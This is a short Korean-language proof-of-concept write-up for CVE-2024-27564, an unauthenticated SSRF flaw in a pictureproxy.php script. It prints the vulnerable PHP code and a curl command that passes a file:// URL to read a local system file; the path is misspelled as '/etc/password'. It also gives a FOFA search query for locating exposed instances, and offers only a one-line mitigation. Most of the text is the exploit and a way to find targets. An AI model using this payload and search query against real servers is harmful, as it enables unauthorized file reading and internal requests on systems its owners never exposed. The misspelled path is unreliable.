
CVE-2024-27564에 대한 개념 증명으로, pictureproxy.php의 url 파라미터를 통한 인증되지 않은 SSRF 취약점이며, 취약한 코드, curl PoC, 완화 방안을 포함합니다.
pictureproxy.php의 취약점으로 인해 원격 공격자가 url 파라미터에 URL을 주입하여 임의의 요청을 수행할 수 있습니다. 이 SSRF 취약점은 인증 없이 악용될 수 있어 특히 위험합니다.
취약한 코드는 pictureproxy.php 파일에 있습니다. 이 문제는 함수가 url 파라미터를 적절히 검증하지 않기 때문에 발생합니다. $_GET['url'] 변수가 file_get_contents() 함수에 전달되어 지정된 URL에서 콘텐츠를 가져옵니다. 이로 인해 SSRF가 발생할 수 있습니다.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Curl 요청:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
입력 검증에 대한 적절한 관리가 필요합니다.